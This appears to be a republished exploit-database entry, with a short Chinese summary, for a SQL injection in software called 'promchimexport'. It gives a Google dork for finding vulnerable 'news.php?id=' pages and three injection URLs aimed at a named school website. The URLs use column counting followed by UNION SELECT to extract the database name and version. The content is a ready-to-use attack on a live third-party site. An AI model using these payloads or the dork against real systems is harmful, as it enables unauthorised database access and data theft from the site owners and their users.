promchimexport - SQL Injection
promchimexport 存在 SQL 注入漏洞,影响 Win 和 Linux 系统。攻击者可通过构造恶意 URL(如 `news.php?id=129%27+order+by+8--+`)执行 SQL 查询,获取数据库信息或控制数据库操作。 2025-12-24 21:33:58 Author: cxsecurity.com(查看原文) 阅读量:3 收藏
promchimexport 存在 SQL 注入漏洞,影响 Win 和 Linux 系统。攻击者可通过构造恶意 URL(如 `news.php?id=129%27+order+by+8--+`)执行 SQL 查询,获取数据库信息或控制数据库操作。 2025-12-24 21:33:58 Author: cxsecurity.com(查看原文) 阅读量:3 收藏
promchimexport - SQL Injection
"promchimexport - SQL Injection" # Exploit Title: promchimexport - SQL Injection # Date: 12-23-2025 # Exploit Author: javad rashidi # Tested on: Win,Linux # Google Dork: inurl:"news.php?id=" https://paramekkavuvidyamandir.edu.in/news.php?id=129%27+order+by+8--+ https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,2,3,4,5,6,7,8--+ https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,database(),version(),4,5,6,7,8--+
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
文章来源: https://cxsecurity.com/issue/WLB-2025120024
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh